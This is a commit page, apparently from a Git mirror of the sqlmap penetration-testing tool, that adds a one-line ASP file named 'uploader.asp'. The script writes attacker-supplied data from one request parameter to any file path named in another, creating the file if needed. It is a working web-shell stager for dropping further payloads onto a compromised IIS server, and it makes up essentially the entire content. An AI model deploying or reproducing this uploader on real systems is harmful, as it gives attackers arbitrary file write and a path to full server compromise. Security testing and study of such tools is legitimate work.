mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-25 11:03:47 +03:00
Added an ASP uploader
This commit is contained in:
parent
e10ab5aa0e
commit
9b0f11f879
1
shell/uploader.asp
Normal file
1
shell/uploader.asp
Normal file
|
@ -0,0 +1 @@
|
|||
<%set f = server.createobject("Scripting.FileSystemObject"):set o=f.OpenTextFile(Request("f"), 2, True):o.Write Request("d"):o.Close:set o=Nothing:set f=Nothing%>
|
Loading…
Reference in New Issue
Block a user